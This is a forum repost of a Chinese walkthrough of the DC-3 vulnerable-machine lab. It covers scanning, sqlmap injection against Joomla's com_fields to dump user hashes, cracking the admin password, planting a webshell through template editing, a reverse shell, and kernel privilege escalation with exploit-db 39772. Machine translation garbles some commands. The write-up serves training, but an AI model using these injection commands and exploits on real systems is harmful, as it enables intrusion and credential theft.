跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

vulhub靶场 DC-3 复现学习及细节解析

猫児1
猫児1
WEB和服务器安全漏洞

精选回复

发布于

啰嗦几句: 提权工作已于一个月前完成。当时提权出现问题,就被搁置了。今天才完成,因此IP 地址可能会发生变化。注:后续IP地址为192.168.200.55,也是目标IP地址。如果这篇文章能对您有所帮助,我将不胜荣幸。

# 1.设置环境

### 1. 工具

攻击机:kali (192.168.200.14)

目标无人机:DC-3(暂时未知)

### 2.注意

攻击机和目标机的网络连接方式必须相同。另外,DC-1的网络连接方式为NAT模式,与kali的网络连接方式相同(当然也可以选择桥接模式)

DC-1网络设计

点击高级后可以查看DC-1目标机的MAC地址,方便扫描IP时识别。

## 2.信息收集

### 1.扫描同网段存活主机

目标无人机dc-3的MAC地址,根据MAC地址1703640637_658b7e3d278e54a7bf19e.png!small?1703640638795确定IP地址

一:

````

arp-扫描-l

``1703640647_658b7e4766569da45725e.png!small?1703640648995

第二:

````

nmap -sP 192.168.200.0/24 -T4

``1703640655_658b7e4fac5e6ad76fe16.png!small?1703640657335

第三:

````

纳特发现

``1703640665_658b7e59d98f2619c403b.png!small?1703640667344

### 2.扫描目标IP开放端口

````

nmap -sV -p-192.168.200.8

#-sV 扫描目标主机端口上运行的软件信息

#-p-扫描所有端口0-65535

``1703640673_658b7e61336f9d5b41ba3.png!small?1703640674664

可以看到这个网站,只开放80端口

### 3.扫描后台目录

使用dirsearch工具,可以看到管理员目录,应该是后台1703640680_658b7e6840ed00a4c933f.png!small?1703640681758

### 4.指纹采集

登录网站

著名CMS系统1703640687_658b7e6fd4f7e0aff4af7.png!small?1703640689315

左边的英文翻译是:

这一次,只有一面旗帜,一个入口,没有任何线索。要获得此标志,您显然必须获得root 权限(提升的权限)。你如何成为root 显然取决于你的—— 和系统。祝你好运,我希望你喜欢这个小挑战。

使用joomscan 扫描

````

joomscan -u http://192.168.200.8/

````

joomscan安装方法

````

sudo apt-get install joomscan

``1703640729_658b7e9926b536855b8b9.png!small?1703640730688

一般:可以根据框架版本去百度搜索与其相关的漏洞,首先登录后端目录1703640736_658b7ea08fa60b0f5ba16.png!small?1703640738031

百度搜索后,可以找到同样的SQL漏洞1703640743_658b7ea7a3ef5e0f3fbe3.png!small?1703640745227

使用KILI工具查找漏洞1703640753_658b7eb139b88e6709424.png!small?1703640754681

查看文件1703640760_658b7eb8d7c87faf5a3c3.png!small?1703640762219

### 5.后台爆破1703640772_658b7ec4e114d90010881.png!small?1703640774527

sqlmap 列出数据库库名称

sqlmap -u \'http://192.168.200.8/index.php ?option=com\\_fieldsview=fieldslayout=modallist\\[fullordering\\]=updatexml\' --risk=3 --level=5 --random-agent --dbs -p list\\[fullordering\\]

Payload 1703640782_658b7ece1618074b12a9d.png!small?1703640783779 基于提供的SQLmap 构建

sqlmap列出数据库joomladb下的所有表名

sqlmap -u \'http://192.168.200.8/index.php?option=com\\_fieldsview=fieldslayout=modallist\\[fullordering\\]=updatexml\' --risk=3 --level=5 --random-agent -D \'joomladb\' --tables -p list\\[fullordering\\] 1703640791_658b7ed71112ece164005.png!small?1703640792740

找到#\\_users 表

列出users表的字段类型

sqlmap -u \'http://192.168.200.8/index.php?option=com\\_fieldsview=fieldslayout=modallist\\[fullordering\\]=updatexml\' --risk=3 --level=5 --random-agent -D \'joomladb\' -T \'#\\_\\_users\' --columns -p list\\[fullordering\\]

信息在#\\_\\_users 1703640801_658b7ee18aaf66826bd01.png!small?1703640803007

确定帐户名。账户密码一般为“用户名,密码”

爆炸数据

sqlmap -u \'http://192.168.200.8/index.php?option=com\\_fieldsview=fieldslayout=modallist\\[fullordering\\]=updatexml\' --dbms mysql -D joomladb -T '#\\_\\_users' -C id,名称,密码,用户名--dump 1703640809_658b7ee9aa5af13fdd3ea.png!small?1703640811566

````

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu #HashEncryption

````

使用kali中的join工具解密

````

vi admin.txt #编辑写入密文

约翰admin.txt #Crack

``1703640816_658b7ef04052dd387a564.png!small?1703640817933

破解后登录密码为:snoopy 账号:admin

登录后台1703640826_658b7efa0537f518d242b.png!small?1703640827467

## 3.漏洞检测

### 上传Webshell

可以找到网站的源代码,可以编辑模板中的php文件。1703640833_658b7f01aa455dfc74fda.png!small?1703640835328

Joomla后端可编辑模板,使用此功能在模板下创建一个test.php,写一句话,蚁剑成功连接1703640841_658b7f095e2c39093c795.png!small?1703640842903

1703640848_658b7f10878b061f60333.png!small?1703640850148

1703640855_658b7f1751aa994701a10.png!small?1703640856993

一句话木马的上传路径如下。此时,您可以浏览网站目录并打开虚拟终端。1703640863_658b7f1fb24a22dd98fa3.png!small?1703640865178

1703640914_658b7f527135a06292d59.png!small?1703640915885

模板询问路径(直接访问当前文件夹即可获取当前文件夹的内容)

````

http://192.168.200.8/templates/beez3/html/

``1703640921_658b7f599ad2b5a170351.png!small?1703640923068

### 反弹壳

在/templates/beez3 模板中上传反弹shell 文件。记住上传路径。该文件是您自己创建的。本文文件名为shell.php 1703640932_658b7f64a1664cf5f2b4a.png!small?1703640934290

反弹壳成功1703640939_658b7f6b6cb93a27b0de9.png!small?1703640940960

### 利用经验

使用**searchsploit工具**搜索Ubuntu 16.04中的提权问题,找到可用于提权的“拒绝服务漏洞”。

````

搜索sploit ubuntu 16.04

``1703640946_658b7f727236579ec88f2.png!small?1703640948132

查看漏洞并下载EXP

````

cp /usr/share/exploitdb/exploits/linux/local/39772.txt shell.txt

猫shell.txt

````

文件内容提供EXP URL 1703640954_658b7f7a09331fe5f43bf.png!small?1703640955482

下载(此步骤在目标机中执行,此步骤执行错误)1703640962_658b7f82b6352d5a0f7df.png!small?1703640964580

解压文件

````

unzip 39772.zip #解压29772.zip文件

光盘39772

tar -xvfexploit.tar #解压exploit提权脚本tar包

cd ebpf_mapfd_doubleput_exploit

``1703640974_658b7f8e0593027fee393.png!small?1703640975610

1703640979_658b7f936134c610c10e9.png!small?1703640980764

1703640984_658b7f98d63942832e959.png!small?1703640986594

### 权限提升

编译代码

````

./compile.sh #执行脚本并编译文件

``1703640992_658b7fa04ad98dfccecb1.png!small?1703640993742

提升权限并获取root权限

````

./doubleput #执行提权文件

````

请稍等1703641000_658b7fa87e263a4753648.png!small?1703641002105

1703641007_658b7faf9db5635391167.png!small?1703641009165

文章参考:[https://blog.csdn.net/weixin\\_43583637/article/details/101554815](https://blog.csdn.net/weixin_43583637/article/details/101554815) 转载自freebuf: [https://www.freebuf.com/articles/web/387841.html](https://www.freebuf.com/articles/web/387841.html)作者:锦鲤

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。